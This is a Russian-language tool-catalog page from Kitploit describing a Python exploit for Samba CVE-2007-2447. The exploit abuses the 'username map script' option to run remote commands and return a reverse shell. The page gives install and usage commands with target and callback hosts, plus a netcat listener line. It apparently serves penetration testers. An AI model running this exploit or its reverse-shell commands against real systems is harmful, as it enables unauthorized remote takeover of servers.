Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2007-2447 — Python-эксплойт для Samba CVE-2007-2447: удалённое выполнение команд через username map script, доставляющий reverse shell полезную нагрузку на настраиваемый удалённый слушатель. | Kitploit
Инструменты/GitHubGitHub/0xkn/cve-2007-2447
Анализ уязвимостейЭксплуатацияШелл-кодТестирование на ПроникновениеКомандование и УправлениеИнструмент Удаленного Доступа
GitHub0xkn/cve-2007-2447

CVE-2007-2447

Python-эксплойт для Samba CVE-2007-2447: удалённое выполнение команд через username map script, доставляющий reverse shell полезную нагрузку на настраиваемый удалённый слушатель.

Репозиторий
45 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2007-2447 — username map script

«Функциональность MS-RPC в smbd в Samba 3.0.0–3.0.25rc3 позволяет удалённым злоумышленникам выполнять произвольные команды через метасимволы оболочки с участием функции (1) SamrChangePassword, когда включена опция smb.conf «username map script», а также позволяет удалённым аутентифицированным пользователям выполнять команды через метасимволы оболочки с участием других функций MS-RPC в (2) удалённом принтере и (3) управлении файловыми ресурсами.»

Эксплойт

Установка:

[*] Для этого эксплойта требуется Python 3.7 или выше

root@kitploit:~
python3 -m pip install pysmb 

Использование:

root@kitploit:~
$ ./CVE-2007-2447.py --rhost 10.10.10.3 --lhost 10.10.14.10 --lport 4444 --rport 445
  • --rhost — удалённый хост
  • --lhost — локальный хост
  • --lport — локальный порт
  • --rport — удалённый порт [ * ] Опционально. По умолчанию = 445
  • Не забудьте запустить свой слушатель:

    root@kitploit:~
    nc -lvnp 4444
    

    PoC

    image

    Скачать инструмент